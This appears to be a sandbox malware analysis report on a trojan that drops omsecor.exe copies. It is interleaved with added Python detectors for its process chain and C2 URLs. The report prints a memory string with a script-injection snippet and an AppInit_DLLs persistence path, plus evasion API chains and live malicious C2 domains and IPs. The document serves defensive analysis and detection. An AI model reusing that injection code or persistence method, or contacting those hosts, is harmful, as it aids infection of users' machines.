Source: C:\Users\user\Desktop\cOviNFmw21.exe | Sections loaded: apphelp.dll, wininet.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Sections loaded: apphelp.dll, wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Sections loaded: apphelp.dll, wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, iphlpapi.dll, mswsock.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll
Source: C:\Windows\SysWOW64\omsecor.exe (second omsecor.exe process) | Sections loaded: apphelp.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, ondemandconnroutehelper.dll, winhttp.dll, iphlpapi.dll, mswsock.dll, winnsi.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Code function: 1_2_0040D293 push ecx; ret 1_2_0040D2A3
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Code function: 1_2_0040CBB5 push ecx; ret 1_2_0040CBC8
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 11_2_0040D293 push ecx; ret 11_2_0040D2A3
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 11_2_0040CBB5 push ecx; ret 11_2_0040CBC8
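The process-creation lines above are the part of this report that turns into a host detection most directly: the dropper on the Desktop starts %AppData%\Roaming\omsecor.exe, that copy plants and starts C:\Windows\SysWOW64\omsecor.exe, and the system-directory copy relaunches itself with /nomove. Note the redirection caveat visible in the report itself: the child is logged with its image under SysWOW64 but its command line under System32, because a 32-bit process sees System32 through WoW64 file-system redirection, so any rule has to treat the two spellings as one path. The following Python is an added example, not code from the report or from the sample: it scores Sysmon Event ID 1 style records (ProcessId, ParentProcessId, Image, CommandLine) for that chain and walks the parent links back to the root. The record layout and the sample events are constructed here from the report's process tree; the PIDs 5344, 3808, 1732 and 6904 are the ones the report lists, and explorer.exe/notepad.exe are benign filler.

```python
"""Flag the omsecor.exe installation chain in process-creation telemetry.

Added example, not part of the Joe Sandbox report or the sample. Records are
Sysmon Event ID 1 style (ProcessId, ParentProcessId, Image, CommandLine); the
sample records at the bottom are constructed from the report's process tree.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the started image
    cmdline: str   # command line as logged


USER_DIR = re.compile(r"^[a-z]:\\users\\", re.I)
# A 32-bit process sees C:\Windows\System32 as C:\Windows\SysWOW64 through
# WoW64 file-system redirection; the report logs the child's Image under
# SysWOW64 but its CommandLine under System32, so both spellings count.
WINDOWS_SYS_DIR = re.compile(r"^[a-z]:\\windows\\(system32|syswow64)\\", re.I)
KNOWN_NAMES = {"omsecor.exe"}   # dropped-file name from the report


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def canon(path: str) -> str:
    """Lower-case and fold SysWOW64 onto System32 so the two spellings compare equal."""
    return path.lower().replace("\\syswow64\\", "\\system32\\")


def reasons_for(ev: ProcEvent, parent: Optional[ProcEvent]) -> List[str]:
    """Return the detection reasons that apply to one process-creation record."""
    reasons = []
    name = basename(ev.image)
    if name in KNOWN_NAMES:
        reasons.append(f"known Neconyd dropped-file name {name}")
    if parent is None:
        return reasons
    # Stage 2: a binary under a user profile starts a same-named binary that it
    # planted in the Windows system directory (masquerading as a system file).
    if (USER_DIR.match(parent.image) and WINDOWS_SYS_DIR.match(ev.image)
            and basename(parent.image) == name):
        reasons.append("user-profile binary spawned same-named copy from Windows system dir")
    # Stage 3: the system-directory copy relaunches itself with /nomove.
    if canon(parent.image) == canon(ev.image) and "/nomove" in ev.cmdline.lower().split():
        reasons.append("self-relaunch with /nomove switch")
    return reasons


def detect(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map PID -> reasons for every record that triggers at least one reason."""
    by_pid = {e.pid: e for e in events}
    findings = {}
    for e in events:
        r = reasons_for(e, by_pid.get(e.ppid))
        if r:
            findings[e.pid] = r
    return findings


def chain_for(events: List[ProcEvent], pid: int) -> List[ProcEvent]:
    """Walk ParentProcessId links back to the root so the whole
    dropper -> %AppData% -> SysWOW64 -> /nomove sequence can be shown."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    cur = by_pid.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain[::-1]


# Constructed records mirroring the report's process tree; explorer.exe and
# notepad.exe are benign filler to show that ordinary launches do not fire.
SAMPLE_EVENTS = [
    ProcEvent(4000, 1000, r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(5344, 4000, r"C:\Users\user\Desktop\cOviNFmw21.exe",
              r'"C:\Users\user\Desktop\cOviNFmw21.exe"'),
    ProcEvent(3808, 5344, r"C:\Users\user\AppData\Roaming\omsecor.exe",
              r"C:\Users\user\AppData\Roaming\omsecor.exe"),
    ProcEvent(1732, 3808, r"C:\Windows\SysWOW64\omsecor.exe",
              r"C:\Windows\System32\omsecor.exe"),
    ProcEvent(6904, 1732, r"C:\Windows\SysWOW64\omsecor.exe",
              r"C:\Windows\SysWOW64\omsecor.exe /nomove"),
    ProcEvent(7100, 4000, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for pid, why in detect(SAMPLE_EVENTS).items():
        print(pid, " -> ".join(basename(e.image) for e in chain_for(SAMPLE_EVENTS, pid)), why)
```

The file-name match is the weakest of the three reasons (a rebuild can rename the dropped file); the two structural reasons, a user-profile binary starting a same-named copy from the system directory and a system-directory binary relaunching itself with a switch, survive a rename and are the ones worth keeping in a rule.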

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\omsecor.exe | Executable created and started: C:\Windows\SysWOW64\omsecor.exe
Source: C:\Users\user\Desktop\cOviNFmw21.exe | File created (dropped file): C:\Users\user\AppData\Roaming\omsecor.exe
Source: C:\Users\user\AppData\Roaming\omsecor.exe | File created (dropped file): C:\Windows\SysWOW64\omsecor.exe
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess (graph_1-3591)
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_1-3591)
Source: C:\Windows\SysWOW64\omsecor.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_11-3591)
Source: C:\Windows\SysWOW64\omsecor.exe | Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess (graph_11-3591)
Source: C:\Windows\SysWOW64\omsecor.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess (graph_11-3525)
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess (graph_1-3544)
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep (graph_1-3654)
Source: C:\Windows\SysWOW64\omsecor.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep (graph_11-3670)
Source: C:\Users\user\AppData\Roaming\omsecor.exe TID: 3888 | Thread sleep time: -40000s >= -30000s
Source: C:\Windows\SysWOW64\omsecor.exe TID: 3268 | Thread sleep time: -80000s >= -30000s
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Code function: 1_2_0040ABD9 FindFirstFileW,FindClose
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 11_2_0040ABD9 FindFirstFileW,FindClose
Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWpDR%SystemRoot%\system32\mswsock.dll
Source: omsecor.exe, 00000002.00000002.1551324123.00000000005BC000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.1551324123.000000000055E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000B.00000002.2498117710.000000000051A000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000F.00000002.2500201090.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000F.00000002.2500201090.000000000065B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: omsecor.exe, 0000000B.00000002.2498117710.000000000051A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWta
Source: omsecor.exe, 00000002.00000002.1551324123.00000000005BC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW>
Source: C:\Users\user\Desktop\cOviNFmw21.exe | API call chain: ExitProcess graph end node (graph_1-3675)
Source: C:\Windows\SysWOW64\omsecor.exe | API call chain: ExitProcess graph end node (graph_11-3675)
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Code function: 1_2_0040D00B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Code function: 1_2_004075D4 GetLastError,CreateFileW,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,RtlAllocateHeap,ReadFile,ReadFile,WriteFile,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,WriteFile,CloseHandle,CloseHandle,CloseHandle
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 11_2_0040D00B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: cOviNFmw21.exe, omsecor.exe | Binary or memory string: Shell_TrayWnd
Source: cOviNFmw21.exe, omsecor.exe.1.dr, omsecor.exe.2.dr | Binary or memory string: ftpPriorHostTimeCorrUniqueNumhttp://AppEvents\Schemes\Apps\Explorer\Navigating\.currentSOFTWARE\Classes\MIME\Database\Content Type\text/htmlapplication/x-javascripttext/javascriptCLSIDBuildSOFTWARE\Microsoft\Internet ExplorerJOB FILE^nocryptPage generated at: http:__scMMdj490)0-Osdurandcrandsetvarmsec1970b_nav_time*CsMSoftware\Microsoft\Windows NT\CurrentVersion\WindowsAppInit_DLLsC:\WINDOWS\system32\gbdwpbm.dll.jar.mpeg.mpg.3gp.mov.mkv.wmv.avi.mp3.pdf.7z.gz.exe.rar.zip.xls.docvar scr= document.createElement("script"); scr.src = "%s"; document.getElementsByTagName("head")[0].appendChild(scr);Aahttp_self&host=track_eventsjavascriptbegun.ru/click.jsp?url=an.yandex.ru/count_blank,"url""domain""encrypted""URL""condition_id""kwtype"<domain></domain><url></url><title></title>http://click0^POSTShell.ExplorerAtlAxWineventConnShell_TrayWndAccept: */*
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Code function: 1_2_0040CB03 cpuid
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Code function: 1_2_00407267 GetSystemTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__aulldiv
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Code function: 1_2_00407499 GetLocalTime,GetLocalTime,GetLocalTime,GetTimeZoneInformation,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Code function: 1_2_00406CB5 GetVersionExW
MITRE ATT&CK matrix, listed per tactic. A number in parentheses is the number shown in that matrix cell for a technique this analysis matched; entries without a number are the remaining placeholder techniques of the matrix grid.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (2); Native API (11); At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (2); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading (121); Virtualization/Sandbox Evasion (1); Process Injection (2); Obfuscated Files or Information (1); DLL Side-Loading (1); Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: System Time Discovery (2); Security Software Discovery (121); Virtualization/Sandbox Evasion (1); Process Discovery (1); File and Directory Discovery (1); System Information Discovery (13)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label
cOviNFmw21.exe | 97% | ReversingLabs | Win32.Trojan.ButeRat
cOviNFmw21.exe | 100% | Avira | HEUR/AGEN.1317135
cOviNFmw21.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\omsecor.exe | 100% | Avira | HEUR/AGEN.1317135
C:\Windows\SysWOW64\omsecor.exe | 100% | Avira | HEUR/AGEN.1317135
C:\Users\user\AppData\Roaming\omsecor.exe | 100% | Joe Sandbox ML |
C:\Windows\SysWOW64\omsecor.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\omsecor.exe | 96% | ReversingLabs | Win32.Trojan.ButeRat

No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://lousta.net/54/325.html | 100% | Avira URL Cloud | phishing
http://mkkuei4kdsz.com/402/288.htmle | 100% | Avira URL Cloud | phishing
http://mkkuei4kdsz.com/ | 100% | Avira URL Cloud | phishing
http://mkkuei4kdsz.com/402/288.html-8a8d424fbe43573ef1LMEM | 100% | Avira URL Cloud | phishing
http://lousta.net/115/685.html53 | 100% | Avira URL Cloud | phishing
http://lousta.net/352/26.html | 100% | Avira URL Cloud | phishing
http://lousta.net/352/26.htmls0 | 100% | Avira URL Cloud | phishing
http://lousta.net/158/950.html | 100% | Avira URL Cloud | phishing
http://mkkuei4kdsz.com/697/241.html | 100% | Avira URL Cloud | phishing
http://lousta.net/616/595.html | 100% | Avira URL Cloud | phishing
http://mkkuei4kdsz.com/697/241.htmll | 100% | Avira URL Cloud | phishing
http://ow5dirasuek.com/56/763.html | 100% | Avira URL Cloud | phishing
http://mkkuei4kdsz.com/910/77.htmlCj | 100% | Avira URL Cloud | phishing
http://lousta.net/352/26.html3418276 | 100% | Avira URL Cloud | phishing
http://ow5dirasuek.com/372/940.htmlj | 100% | Avira URL Cloud | phishing
http://mkkuei4kdsz.com/697/241.htmlasuek.com | 100% | Avira URL Cloud | phishing
http://mkkuei4kdsz.com/697/241.html/ | 100% | Avira URL Cloud | phishing
http://mkkuei4kdsz.com/i | 100% | Avira URL Cloud | phishing
http://ow5dirasuek.com/56/763.htmlWI/ | 100% | Avira URL Cloud | phishing
http://lousta.net/115/685.html | 100% | Avira URL Cloud | phishing
http://lousta.net/352/26.htmlz0o | 100% | Avira URL Cloud | phishing
http://lousta.net/ | 100% | Avira URL Cloud | phishing
http://ow5dirasuek.com/618/507.html; | 100% | Avira URL Cloud | phishing
http://ow5dirasuek.com/56/763.htmluj | 100% | Avira URL Cloud | phishing
http://ow5dirasuek.com/618/507.html | 100% | Avira URL Cloud | phishing
http://ow5dirasuek.com/lousta.net | 100% | Avira URL Cloud | phishing
http://lousta.net/54/325.htmlwshqos.dll.mui | 100% | Avira URL Cloud | phishing
http://ow5dirasuek.com/618/507.html% | 100% | Avira URL Cloud | phishing
http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon | 100% | Avira URL Cloud | phishing
http://lousta.net/j | 100% | Avira URL Cloud | phishing
http://mkkuei4kdsz.com/910/77.htmlIIM | 100% | Avira URL Cloud | phishing
http://ow5dirasuek.com/372/940.html | 100% | Avira URL Cloud | phishing
http://lousta.net/594/342.html | 100% | Avira URL Cloud | phishing
http://ow5dirasuek.com/ta | 100% | Avira URL Cloud | phishing
http://ow5dirasuek.com/en-US | 100% | Avira URL Cloud | phishing
http://mkkuei4kdsz.com/910/77.html0#= | 100% | Avira URL Cloud | phishing
http://mkkuei4kdsz.com/910/77.html$# | 100% | Avira URL Cloud | phishing
http://ow5dirasuek.com/ | 100% | Avira URL Cloud | phishing
http://lousta.net/562/345.html | 100% | Avira URL Cloud | phishing
http://ow5dirasuek.com/56/763.htmlEIY | 100% | Avira URL Cloud | phishing
http://ow5dirasuek.com/56/763.html-F | 100% | Avira URL Cloud | phishing
http://ow5dirasuek.com/56/763.html% | 100% | Avira URL Cloud | phishing
http://mkkuei4kdsz.com/910/77.html | 100% | Avira URL Cloud | phishing
http://mkkuei4kdsz.com/697/241.html~x | 100% | Avira URL Cloud | phishing
http://mkkuei4kdsz.com/402/288.html | 100% | Avira URL Cloud | phishing
http://lousta.net/352/26.htmle1N | 100% | Avira URL Cloud | phishing
Name | IP | Active | Malicious | Antivirus Detection | Reputation
lousta.net | 193.166.255.171 | true | true | | unknown
mkkuei4kdsz.com | 15.197.204.56 | true | true | | unknown
ow5dirasuek.com | 52.34.198.229 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://lousta.net/54/325.html | true | Avira URL Cloud: phishing | unknown
http://mkkuei4kdsz.com/ | true | Avira URL Cloud: phishing | unknown
http://lousta.net/158/950.html | true | Avira URL Cloud: phishing | unknown
http://lousta.net/352/26.html | true | Avira URL Cloud: phishing | unknown
http://mkkuei4kdsz.com/697/241.html | true | Avira URL Cloud: phishing | unknown
http://lousta.net/616/595.html | true | Avira URL Cloud: phishing | unknown
http://ow5dirasuek.com/56/763.html | true | Avira URL Cloud: phishing | unknown
http://lousta.net/115/685.html | true | Avira URL Cloud: phishing | unknown
http://lousta.net/ | true | Avira URL Cloud: phishing | unknown
http://ow5dirasuek.com/618/507.html | true | Avira URL Cloud: phishing | unknown
http://ow5dirasuek.com/372/940.html | true | Avira URL Cloud: phishing | unknown
http://ow5dirasuek.com/ | true | Avira URL Cloud: phishing | unknown
http://lousta.net/562/345.html | true | Avira URL Cloud: phishing | unknown
http://mkkuei4kdsz.com/910/77.html | true | Avira URL Cloud: phishing | unknown
http://mkkuei4kdsz.com/402/288.html | true | Avira URL Cloud: phishing | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://lousta.net/352/26.htmls0 | omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://mkkuei4kdsz.com/402/288.htmle | omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://lousta.net/115/685.html53 | omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://mkkuei4kdsz.com/402/288.html-8a8d424fbe43573ef1LMEM | omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://mkkuei4kdsz.com/697/241.htmll | omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://ow5dirasuek.com/372/940.htmlj | omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://mkkuei4kdsz.com/910/77.htmlCj | omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://lousta.net/352/26.html3418276 | omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://mkkuei4kdsz.com/697/241.htmlasuek.com | omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://mkkuei4kdsz.com/697/241.html/ | omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://mkkuei4kdsz.com/i | omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://ow5dirasuek.com/56/763.htmlWI/ | omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://lousta.net/352/26.htmlz0o | omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://ow5dirasuek.com/56/763.htmluj | omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://ow5dirasuek.com/618/507.html; | omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://lousta.net/54/325.htmlwshqos.dll.mui | omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://ow5dirasuek.com/lousta.net | omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon | cOviNFmw21.exe, omsecor.exe.1.dr, omsecor.exe.2.dr | true | Avira URL Cloud: phishing | unknown
http://ow5dirasuek.com/618/507.html% | omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://lousta.net/j | omsecor.exe, 0000000F.00000002.2500201090.00000000005FE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://mkkuei4kdsz.com/910/77.htmlIIM | omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://ow5dirasuek.com/en-US | omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://ow5dirasuek.com/ta | omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://lousta.net/594/342.html | omsecor.exe, 0000000F.00000002.2500201090.0000000000640000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000F.00000002.2499073566.0000000000195000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 0000000F.00000002.2500201090.00000000005FA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://mkkuei4kdsz.com/910/77.html$# | omsecor.exe, 00000002.00000002.1551324123.000000000055E000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://mkkuei4kdsz.com/910/77.html0#= | omsecor.exe, 00000002.00000002.1551324123.000000000055E000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://ow5dirasuek.com/56/763.htmlEIY | omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://ow5dirasuek.com/56/763.html-F | omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://ow5dirasuek.com/56/763.html% | omsecor.exe, 00000002.00000002.1551324123.00000000005BC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://mkkuei4kdsz.com/697/241.html~x | omsecor.exe, 0000000B.00000002.2498117710.000000000051A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://lousta.net/352/26.htmle1N | omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
193.166.255.171 | lousta.net | Finland | 1741 | FUNETASFI | true
52.34.198.229 | ow5dirasuek.com | United States | 16509 | AMAZON-02US | true
15.197.204.56 | mkkuei4kdsz.com | United States | 7430 | TANDEMUS | true
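The memory-string URL table above is typical of strings pulled from a process dump: the C2 URL is followed by whatever bytes sat next to it in memory ("618/507.html;", "402/288.html-8a8d424fbe43573ef1LMEM", "54/325.htmlwshqos.dll.mui"), and one string is the embedded configuration blob with several "http://" entries run together. The report resolves these to the clean URL table and to three domains with their IPs. The following Python is an added example, not code from the report or from the sample: it canonicalises such dump strings to the family's http://<host>/<digits>/<digits>.html form, groups them under the report's three domains and IPs, sets aside any host the report did not see, and offers a lookup for hostnames, IPs or URLs taken from proxy or DNS logs. C2_HOSTS is copied from the domain/IP table; SAMPLE_STRINGS are constructed from the report's own memory strings plus one hypothetical host (example.org) that exists only to exercise the unknown-host path.

```python
"""Canonicalise C2 URLs recovered from memory dumps and match them against the
report's infrastructure.

Added example, not part of the Joe Sandbox report or the sample. C2_HOSTS is
the report's domain/IP table; SAMPLE_STRINGS are constructed from the report's
memory strings plus one hypothetical host (example.org).
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List

# Domain -> IP as resolved during the analysis.
C2_HOSTS = {
    "lousta.net": "193.166.255.171",
    "mkkuei4kdsz.com": "15.197.204.56",
    "ow5dirasuek.com": "52.34.198.229",
}

# The family's request paths are <digits>/<digits>.html. Anything after that in
# a dump string (";", "e", "-8a8d424fbe43573ef1LMEM", "wshqos.dll.mui") is
# adjacent heap or stack data, not part of the URL, so the path group stops at
# ".html" and the residue is dropped. A string that holds several URLs back to
# back ("http://a/http://b/") yields one match per "http://".
URL_RE = re.compile(
    r"http://(?P<host>[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})/(?P<path>\d+/\d+\.html)?",
    re.I,
)


def url_host(url: str) -> str:
    return url[len("http://"):].split("/", 1)[0]


def canonicalize(raw: str) -> List[str]:
    """Return every canonical URL embedded in one raw memory string."""
    urls = []
    for m in URL_RE.finditer(raw):
        host = m.group("host").lower()
        path = m.group("path") or ""   # no family-style path -> root URL
        urls.append(f"http://{host}/{path}")
    return urls


def extract_iocs(strings: Iterable[str]) -> Dict[str, object]:
    """Group canonical URLs by host. Hosts outside the report's table are
    returned separately so they get triaged instead of blocked blind."""
    known: Dict[str, set] = defaultdict(set)
    unknown = set()
    for s in strings:
        for url in canonicalize(s):
            host = url_host(url)
            if host in C2_HOSTS:
                known[host].add(url)
            else:
                unknown.add(url)
    return {
        "known": {h: {"ip": C2_HOSTS[h], "urls": sorted(u)} for h, u in known.items()},
        "unknown": sorted(unknown),
    }


def is_c2_indicator(observed: str) -> bool:
    """True when a logged hostname, IP, or URL (any scheme, optional port)
    points at one of the report's C2 hosts or addresses."""
    host = re.sub(r"^[a-z]+://", "", observed.strip().lower())
    host = host.split("/", 1)[0].split(":", 1)[0]
    return host in C2_HOSTS or host in C2_HOSTS.values()


# Constructed from the report's memory strings; the last entry is hypothetical.
SAMPLE_STRINGS = [
    "http://ow5dirasuek.com/618/507.html;",
    "http://ow5dirasuek.com/en-US",
    "http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon",
    "http://mkkuei4kdsz.com/402/288.html-8a8d424fbe43573ef1LMEM",
    "http://lousta.net/54/325.htmlwshqos.dll.mui",
    "http://lousta.net/352/26.html3418276",
    "http://mkkuei4kdsz.com/697/241.htmlasuek.com",
    "http://example.org/1/2.html",
]

if __name__ == "__main__":
    result = extract_iocs(SAMPLE_STRINGS)
    for host, info in sorted(result["known"].items()):
        print(host, info["ip"], info["urls"])
    print("unknown:", result["unknown"])
```

Two of the three addresses sit in cloud or hosting space according to the ASN table (AMAZON-02 and TANDEM), so a domain-based block or DNS sinkhole is the durable control; the IPs are still worth alerting on for the period around this analysis but should be expected to churn.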
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1569326
                Start date and time:2024-12-05 18:03:12 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 4m 40s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
